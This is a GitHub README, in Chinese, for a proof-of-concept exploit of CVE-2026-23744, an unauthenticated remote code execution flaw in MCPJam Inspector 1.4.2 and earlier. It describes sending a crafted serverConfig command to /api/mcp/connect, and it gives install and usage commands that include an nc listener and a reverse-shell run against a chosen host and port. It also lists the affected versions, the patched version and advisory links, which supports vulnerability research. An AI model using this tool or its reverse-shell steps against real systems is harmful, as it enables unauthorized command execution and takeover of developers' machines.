ozcanpng/CVE-2026-23744
GitHub: ozcanpng/CVE-2026-23744
针对 MCPJam Inspector 未授权 RCE 漏洞(CVE-2026-23744)的 PoC 利用工具,支持命令验证与反弹 Shell。
Stars: 0 | Forks: 0
# CVE-2026-23744 — MCPJam Inspector 未授权 RCE
CVE-2026-23744 的未授权远程代码执行 PoC。MCPJam Inspector `1.4.2` 及更早版本通过 `/api/mcp/connect` 暴露了相关功能,可以在无需身份验证的情况下启动由攻击者控制的 MCP 服务器命令。
## 功能说明
```
HTTP POST -> /api/mcp/connect -> serverConfig command -> process launch -> command execution
```
1. 构建精心构造的 MCP `serverConfig` 负载。
2. 将目标对准未授权的 `/api/mcp/connect` 端点。
3. 通过 `bash -c` 启动配置的命令。
4. 支持安全的命令验证和 reverse shell 负载。
5. 提供空运行/调试模式,以便在发送流量前检查负载。
## 截图
### Reverse shell 设置

### MCPJam connect 负载

### 接收到的 Shell

## 安装说明
```
git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
```
## 用法
### 安全命令验证
```
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
```
### 反向 shell
首先启动一个监听器:
```
rlwrap nc -lvnp 4444
```
然后运行:
```
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
```
实用选项:
```
--cmd COMMAND Command to execute (default: id)
--server-id VALUE serverId value in the crafted MCP config (default: pwn)
--dry-run Build payload flow without sending the HTTP request
--debug Print endpoint and JSON payload
--verify-tls Verify HTTPS certificates
--timeout SECONDS HTTP timeout in seconds (default: 8)
--yes Skip reverse-shell confirmation prompt
```
## 受影响情况
| 产品 | 受影响版本 | 所需权限 | 影响 |
|---------|------------------|-----------------|--------|
| MCPJam Inspector | `<= 1.4.2` | 无 | 以 MCPJam Inspector 进程用户身份执行远程命令 |
当 MCPJam Inspector 监听 `0.0.0.0` 时,该漏洞尤为容易暴露,允许远程主机访问该开发服务。
## 注意事项
- 该 PoC 向 `/api/mcp/connect` 发送 JSON 负载。
- 命令通过 `serverConfig.command` 和 `serverConfig.args` 传递。
- 在尝试 reverse shell 之前,建议使用 `--cmd` 进行安全验证。
- 使用 `--dry-run --debug` 检查生成的请求,而无需触及目标。
- 根据 NVD 的信息,版本 `1.4.3` 包含了上游补丁。
## 参考文献
- [NVD — CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744)
- [GitHub 安全公告 — GHSA-232v-j27c-5pp6](https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6)
- [补丁提交](https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a)
- [MCPJam Inspector](https://github.com/MCPJam/inspector)
## PoC 作者
ozcanpng — [github.com/ozcanpng](https://github.com/ozcanpng) — [ozcanpng.dev](https://ozcanpng.dev)
标签:Homebrew安装, 逆向工具